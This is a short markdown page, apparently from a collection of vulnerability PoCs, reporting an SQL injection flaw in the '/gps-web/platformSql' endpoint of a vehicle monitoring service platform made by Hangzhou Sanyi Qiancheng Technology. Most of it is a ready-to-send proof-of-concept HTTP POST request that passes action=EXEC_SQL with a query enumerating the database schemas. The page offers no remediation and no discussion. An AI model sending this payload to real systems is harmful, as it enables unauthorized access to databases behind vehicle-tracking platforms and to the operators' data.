Skip to content

Latest commit

 

History

History
20 lines (13 loc) · 498 Bytes

杭州三一谦成科技车辆监控服务平台接口platformSql存在SQL注入漏洞.md

File metadata and controls

20 lines (13 loc) · 498 Bytes
Raw

杭州三一谦成科技车辆监控服务平台接口platformSql存在SQL注入漏洞

杭州三一谦成科技车辆监控服务平台接口 /gps-web/platformSql 存在SQL 注入漏洞

poc

POST /gps-web/platformSql HTTP/1.1
Host:
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate
Accept: */* Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

action=EXEC_SQL&params=SELECT schema_name FROM information_schema.schemata